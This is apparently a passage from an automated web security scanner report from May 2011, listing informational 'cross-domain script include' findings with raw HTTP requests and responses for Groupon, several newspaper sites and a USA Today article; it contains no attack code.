Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.43. http://www.groupon.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.44. http://www.groupon.com/rounded_bottom.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /rounded_bottom.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rounded_bottom.png HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/learn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:38 GMT
Expires: Mon, 09 May 2011 15:38:48 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="http://assets1.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.45. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

18.46. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://secure-assets.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="https://secure-assets.grouponcdn.com/javascripts/common/focus.js?dCvk55U3" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.47. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/jquery.md5.js?Oz7bVl92" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/finch.js?h-HfaZ3f" type="text/javascript"></script>
<script src="https://secure-assets.grouponcdn.com/javascripts/common/groupon_finch.js?lcGEDV4e" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://secure-assets.grouponcdn.com/assets/application.js?OxIWiUVz" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="https://secure-assets.grouponcdn.com/assets/facebook.js?K2umkWBs" type="text/javascript"></script>
...[SNIP]...

18.48. http://www.hnedata.net/features/tr_stock_charts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hnedata.net
Path:   /features/tr_stock_charts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /features/tr_stock_charts HTTP/1.1
Host: www.hnedata.net
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: 0
cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: FreakAuth=5518e37387eae06696e574f8c1f4da91; expires=Mon, 09-May-2011 17:37:33 GMT; path=/
Last-Modified: Mon, 09 May 2011 15:37:09 GMT
Content-Type: text/html
Content-Length: 1583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic<
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />


<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div style="width:300px;height:148px;overflow:hidden"><script src="http://www.macroaxis.com/widgets/url.jsp?t=26&s=NYA,IXIC,GSPC"></script>
...[SNIP]...

18.49. http://www.natchezdemocrat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.natchezdemocrat.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124195861.1304954844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=124195861.1072315151.1304954844.1304954844.1304954844.1; __utmc=124195861; __utmb=124195861.1.10.1304954844

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Last-Modified: Mon, 09 May 2011 15:36:27 GMT
Vary: Accept-Encoding,Cookie
Expires: Mon, 09 May 2011 16:36:27 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Etag: 9f7d4ebf4b1f290977c44ce93671a199
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 57842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://www.natchezdemocrat.com/wp-content/plugins/Barometer/files/rBarStyles.css" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...
<div class="ad300x noAd"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad190x90" style="float:right;margin-right:10px;"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad728x90"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x noAd"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad300x ads"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div class="ad728x90"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...

18.50. http://www.therepublic.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/process/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 64489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<head>
   <meta name="google-site-verification" content="rDoJHMU_Kg8iBXy4lutSBUULkgdb6uCJc0BnDPddbts
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js" async></script>
...[SNIP]...

18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_segs=D08734_70008|D08734_72078; rsi_seg=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
